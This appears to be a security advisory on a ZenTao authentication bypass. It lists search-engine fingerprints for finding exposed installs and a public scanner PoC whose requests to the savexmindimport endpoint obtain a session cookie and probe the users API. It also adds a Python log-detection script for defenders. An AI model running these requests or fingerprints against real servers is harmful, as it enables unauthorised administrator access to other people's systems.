zentao-testcase-savexmindimport-unauth: Authentication bypass vulnerability in the ZenTao project management system

Date: 2025-09-01 | Affected software: ZenTao project management system | PoC: public

Vulnerability description

ZenTao is a Chinese open-source, free project management system. Certain versions of the open-source, enterprise (biz) and ultimate (max) editions contain an authentication bypass vulnerability; an attacker can use it to create an administrator account and obtain back-end administrator privileges.

Asset search fingerprints:
Fofa: app="易软天创-禅道系统"
Hunter: app.name="ZenTao 禅道 ALM"
Quake: app:"禅道系统"
ZoomEye: app:"ZenTaoPMS"

PoC code [public]

id: zentao-testcase-savexmindimport-unauth

info:
  name: 禅道项目管理系统存在身份认证绕过漏洞
  author: Y3y1ng
  severity: Critical
  verified: true
  description: |
    禅道项目管理软件是国产的开源免费项目管理软件,禅道系统在开源版、企业版、旗舰版的部分版本中都存在身份认证绕过漏洞,攻击者可利用该漏洞创建管理员用户,获得后台管理员权限。
    Fofa: app="易软天创-禅道系统"
    Hunter: app.name="ZenTao 禅道 ALM"
    Quake: app:"禅道系统"
    ZoomEye: app:"ZenTaoPMS"
  affected: |
    16.x <= 禅道项目管理系统< 18.12(开源版)
    6.x <= 禅道项目管理系统< 8.12(企业版)
    3.x <= 禅道项目管理系统< 4.12(旗舰版)
  reference:
    - https://mp.weixin.qq.com/s/F6EorG4kuNLeD1-BSg_plQ
    - https://mp.weixin.qq.com/s/DIPdon4KR5kpAImtCc95aw
  tags: zentao,chandao,unauth
  created: 2024/05/22

rules:
  r0:
    request:
      method: GET
      path: /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy
    expression: |
      response.status == 200
    output:
      search: '"Set-Cookie: (?P<cookie>zentaosid=[^;]+);".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r1:
    request:
      method: GET
      path: /zentao/api.php/v1/users
      headers:
        Cookie: "{{cookie}};"
    expression: |
      response.status == 400 &&
      response.body.bcontains(b'"error":') &&
      response.body.bcontains(b'company-browse') &&
      response.body.bcontains(b'priv')
  r2:
    request:
      method: GET
      path: /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy
    expression: |
      response.status == 200
    output:
      search: '"Set-Cookie: (?P<cookie>zentaosid=[^;]+);".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r3:
    request:
      method: GET
      path: /biz/api.php/v1/users
      headers:
        Cookie: "{{cookie}};"
    expression: |
      response.status == 400 &&
      response.body.bcontains(b'"error":') &&
      response.body.bcontains(b'company-browse') &&
      response.body.bcontains(b'priv')
  r4:
    request:
      method: GET
      path: /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy
    expression: |
      response.status == 200
    output:
      search: '"Set-Cookie: (?P<cookie>zentaosid=[^;]+);".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r5:
    request:
      method: GET
      path: /max/api.php/v1/users
      headers:
        Cookie: "{{cookie}};"
    expression: |
      response.status == 400 &&
      response.body.bcontains(b'"error":') &&
      response.body.bcontains(b'company-browse') &&
      response.body.bcontains(b'priv')
expression: (r0() && r1()) || (r2() && r3()) || (r4() && r5())
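The PoC above chains two requests: an unauthenticated GET to api.php with m=testcase&f=savexmindimport and the header name HTTP_X_REQUESTED_WITH passed as a query parameter, followed by a request to /api.php/v1/users with the zentaosid cookie that was issued. The detection logic below is an added example for defenders, not part of the advisory or the ZenTao project: it scans constructed web-server access log lines for that request pattern and flags a client that chains the trigger with the users API. The log lines, IP addresses and indicator names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (Combined Log Format); not taken from a real system.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Sep/2025:10:00:01 +0000] "GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=abc&branch=xyz HTTP/1.1" 200 512
203.0.113.7 - - [01/Sep/2025:10:00:02 +0000] "GET /zentao/api.php/v1/users HTTP/1.1" 400 91
198.51.100.2 - - [01/Sep/2025:10:00:05 +0000] "GET /zentao/index.php?m=testcase&f=browse&productID=1 HTTP/1.1" 200 8120
198.51.100.2 - - [01/Sep/2025:10:00:09 +0000] "GET /max/api.php/v1/users HTTP/1.1" 401 60
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(target):
    """Return indicator names for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    qs = parse_qs(parts.query)
    hits = []
    # Only the api.php entry point matters here; the PoC uses the /zentao, /biz and /max prefixes.
    if path.endswith("/api.php"):
        if qs.get("m") == ["testcase"] and qs.get("f") == ["savexmindimport"]:
            hits.append("savexmindimport-via-api.php")
        # A header name carried as a GET parameter is the distinctive part of the PoC request.
        if "HTTP_X_REQUESTED_WITH" in qs:
            hits.append("header-name-in-query")
    if path.endswith("/api.php/v1/users"):
        hits.append("users-api")
    return hits

def detect(log_text):
    """Scan log lines and return (ip, target, indicators) for suspicious requests.
    A plain users-API hit is normal traffic; it is reported only when the same
    client IP previously sent the savexmindimport trigger request."""
    findings = []
    triggered = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ind = classify(m["target"])
        if "savexmindimport-via-api.php" in ind:
            triggered.add(m["ip"])
        if "users-api" in ind and m["ip"] in triggered:
            ind.append("chained-after-trigger")
        if ind and ind != ["users-api"]:
            findings.append((m["ip"], m["target"], ind))
    return findings
```

Matching on the client IP is a simplification; correlating on the zentaosid cookie value is more precise where the log records it.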
